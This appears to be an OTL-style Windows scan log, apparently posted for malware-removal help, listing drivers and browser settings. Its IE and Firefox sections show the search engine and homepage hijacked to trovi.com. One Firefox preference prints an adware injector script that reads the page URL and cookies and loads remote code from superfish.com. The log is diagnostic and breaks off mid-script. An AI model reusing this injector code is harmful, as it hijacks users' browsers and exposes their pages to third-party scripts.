DRV:64bit: - [2014/02/22 10:44:13 | 000,924,504 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:64bit: - [2014/02/22 07:14:02 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:64bit: - [2014/02/11 20:48:29 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:64bit: - [2014/02/11 20:48:29 | 000,086,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:64bit: - [2014/02/11 20:48:29 | 000,039,768 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:64bit: - [2014/01/27 09:43:26 | 000,070,592 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\cfwids.sys -- (cfwids)
DRV:64bit: - [2014/01/27 09:37:32 | 000,344,688 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfewfpk.sys -- (mfewfpk)
DRV:64bit: - [2014/01/27 09:33:26 | 000,783,864 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfehidk.sys -- (mfehidk)
DRV:64bit: - [2014/01/27 09:31:34 | 000,520,696 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfefirek.sys -- (mfefirek)
DRV:64bit: - [2014/01/27 09:30:06 | 000,311,600 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfeavfk.sys -- (mfeavfk)
DRV:64bit: - [2014/01/27 09:29:22 | 000,180,272 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfeapfk.sys -- (mfeapfk)
DRV:64bit: - [2014/01/27 09:15:36 | 000,069,352 | ---- | M] (McAfee, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mfeelamk.sys -- (mfeelamk)
DRV:64bit: - [2014/01/21 03:50:24 | 000,096,592 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mfencrk.sys -- (mfencrk)
DRV:64bit: - [2014/01/21 03:50:02 | 000,422,712 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfencbdc.sys -- (mfencbdc)
DRV:64bit: - [2013/12/21 01:02:44 | 004,216,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2013/12/14 18:34:54 | 000,039,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:64bit: - [2013/12/14 18:34:54 | 000,027,032 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:64bit: - [2013/12/04 13:41:54 | 000,226,304 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\BthLEEnum.sys -- (BthLEEnum)
DRV:64bit: - [2013/11/14 02:28:58 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:64bit: - [2013/11/14 02:25:25 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:64bit: - [2013/11/14 02:16:57 | 000,027,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2013/11/14 02:16:54 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:64bit: - [2013/09/23 14:49:22 | 000,197,704 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HipShieldK.sys -- (HipShieldK)
DRV:64bit: - [2013/08/22 08:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:64bit: - [2013/08/22 08:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2013/08/22 07:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:64bit: - [2013/08/22 07:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:64bit: - [2013/08/22 07:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:64bit: - [2013/08/22 07:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:64bit: - [2013/08/22 07:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:64bit: - [2013/08/22 07:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2013/08/22 07:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2013/08/22 07:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:64bit: - [2013/08/22 07:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2013/08/22 07:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:64bit: - [2013/08/22 07:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:64bit: - [2013/08/22 07:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2013/08/22 07:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2013/08/22 07:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:64bit: - [2013/08/22 07:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2013/08/22 07:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:64bit: - [2013/08/22 07:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:64bit: - [2013/08/22 07:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2013/08/22 07:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:64bit: - [2013/08/22 07:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:64bit: - [2013/08/22 07:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2013/08/22 07:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:64bit: - [2013/08/22 07:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:64bit: - [2013/08/22 07:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:64bit: - [2013/08/22 07:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:64bit: - [2013/08/22 07:37:27 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:64bit: - [2013/08/22 07:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:64bit: - [2013/08/22 06:39:58 | 000,020,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WSDPrint.sys -- (WSDPrintDevice)
DRV:64bit: - [2013/08/22 06:39:54 | 000,076,800 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:64bit: - [2013/08/22 06:39:50 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WSDScan.sys -- (WSDScan)
DRV:64bit: - [2013/08/22 06:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:64bit: - [2013/08/22 06:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:64bit: - [2013/08/22 06:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:64bit: - [2013/08/22 06:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:64bit: - [2013/08/22 06:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:64bit: - [2013/08/22 06:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:64bit: - [2013/08/22 06:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:64bit: - [2013/08/22 06:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:64bit: - [2013/08/22 06:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:64bit: - [2013/08/22 06:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:64bit: - [2013/08/22 06:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:64bit: - [2013/08/22 06:37:46 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2013/08/22 06:37:42 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:64bit: - [2013/08/22 06:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2013/08/22 06:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:64bit: - [2013/08/22 06:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2013/08/22 06:36:43 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:64bit: - [2013/08/22 06:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:64bit: - [2013/08/22 06:36:07 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:64bit: - [2013/08/22 06:35:42 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:64bit: - [2013/08/22 03:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:64bit: - [2013/08/12 18:25:46 | 000,017,624 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:64bit: - [2013/08/09 19:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:64bit: - [2013/07/30 13:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:64bit: - [2013/07/25 14:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:64bit: - [2013/06/18 09:46:17 | 000,591,360 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt630x64.sys -- (RTL8168)
DRV:64bit: - [2013/04/29 08:17:34 | 000,047,632 | ---- | M] (Panda Security, S.L.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\PSKMAD.sys -- (PSKMAD)
DRV:64bit: - [2013/01/24 21:12:08 | 000,010,752 | ---- | M] (OSR Open Systems Resources, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\DellRbtn.sys -- (DellRbtn)
DRV:64bit: - [2012/12/28 16:19:48 | 000,578,792 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btfilter.sys -- (BtFilter)
DRV:64bit: - [2012/12/28 16:19:40 | 000,136,424 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_rcp.sys -- (BTATH_RCP)
DRV:64bit: - [2012/12/28 16:19:38 | 000,179,432 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_hcrp.sys -- (BTATH_HCRP)
DRV:64bit: - [2012/12/28 16:19:38 | 000,077,464 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_lwflt.sys -- (BTATH_LWFLT)
DRV:64bit: - [2012/12/28 16:19:36 | 000,115,432 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_avdt.sys -- (btath_avdt)
DRV:64bit: - [2012/12/28 16:19:36 | 000,089,320 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_flt.sys -- (AthBTPort)
DRV:64bit: - [2012/12/28 16:19:34 | 000,345,832 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\btath_a2dp.sys -- (BTATH_A2DP)
DRV:64bit: - [2012/12/21 02:24:02 | 000,466,824 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP)
DRV:64bit: - [2012/12/21 02:24:02 | 000,032,136 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Smb_driver_Intel.sys -- (SmbDrvI)
DRV:64bit: - [2012/12/21 02:24:00 | 000,028,040 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Smb_driver_AMDASF.sys -- (SmbDrv)
DRV:64bit: - [2012/12/17 13:21:30 | 003,735,040 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athw8x.sys -- (athr)
DRV:64bit: - [2012/12/04 18:50:56 | 000,652,344 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:64bit: - [2012/11/12 13:12:04 | 000,050,288 | ---- | M] (UB658) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ElgatoGC658.sys -- (ElgatoGC658Y)
DRV:64bit: - [2012/08/21 14:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/07/02 18:16:02 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:64bit: - [2012/06/25 13:24:50 | 000,092,536 | ---- | M] (CyberLink) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\CLVirtualDrive.sys -- (CLVirtualDrive)
DRV:64bit: - [2012/06/19 11:40:50 | 000,342,528 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2012/06/15 03:50:46 | 000,315,536 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\RtsUVStor.sys -- (RSUSBVSTOR)
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = www.google.com
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = www.google.com
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE:64bit: - HKLM\..\SearchScopes\{D4081D33-6F22-48A3-8C77-50B7381FA1AE}: "URL" = http://www.bing.com/...=IE10TR&pc=DCJB
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = www.google.com
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{D4081D33-6F22-48A3-8C77-50B7381FA1AE}: "URL" = http://www.bing.com/...=IE10TR&pc=DCJB
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.trovi.com...56E5390FD1=
IE - HKCU\..\SearchScopes,DefaultScope = {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}
IE - HKCU\..\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}: "URL" = http://www.trovi.com...archTerms}=
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IE8SRC
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <-loopback>
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Trovi search"
FF - prefs.js..browser.search.order.3: "Bing "
FF - prefs.js..browser.search.selectedEngine: "Trovi search"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.trovi.com...56E5390FD1="
FF - prefs.js..extensions.PV4j0xpiJzSJwJq8.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"onduit\")>-1||url.match(/bing.com[^p]+pc=.+/)||url.match(/search.yahoo.com.+hspart=.+/)||url.indexOf(\"search.imesh\")>-1||url.indexOf(\"search.searchcore\")>-1||url.indexOf(\"searchnu.com\")>-1||url.indexOf(\"searchqu.com\")>-1||url.indexOf(\"shareazaweb\")>-1||url.indexOf(\"searchgby.com\")>-1||url.indexOf(\"mysearchresults.com\")>-1||url.indexOf(\"searchya.com\")>-1||url.indexOf(\"searchgol.com\")>-1||url.indexOf(\"trovi.com\")>-1||url.indexOf(\"search.ask\")>-1||url.indexOf(\"mywebsearch.com\")>-1||url.indexOf(\"search-results.com\")>-1||url.indexOf(\"mysearch.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"Jerusalem.com\")>-1||url.indexOf(\"Vatican.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"http://sporty-glow.com/\")>-1||url.indexOf(\"http://game-trek.net/\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.match(/[/]websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"bestonlinegadgetguide.com\")>-1||url.indexOf(\"odpu.com\")>-1||url.indexOf(\"safesearch.co\")>-1||url.indexOf(\"findamo.com\")>-1||url.indexOf(\"search.myownsearchbox.com\")>-1||url.indexOf(\"datropy.com\")>-1){return}}catch(e){};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//www.superfish.com/ws/sf_main.jsp?dlsource=cbsfastsave&userId=7915780394629461886&CTID=p1&partnername=DiscountLocator\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){var stngs = {attr_name:'s7436871928167141055',szy_domain:[\"getfastmyallnet.com\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13],[125,125,14],[234,60,15],[200,200,16],[336,280,17],[180,150,18],[120,60,19],[800,440,20],[800,600,21]],checkif:function(ifr){return (ifr.getAttribute('s7436871928167141055') || ifr.src.indexOf('=506761')>-1||ifr.src.indexOf('=511181')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"1\",eid:\"72\",hid:\"7436871928167141055\",lt:\"3\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"P3FbVFSu\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);\nreturn a&&a[0]}return null}(),getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if©for(var 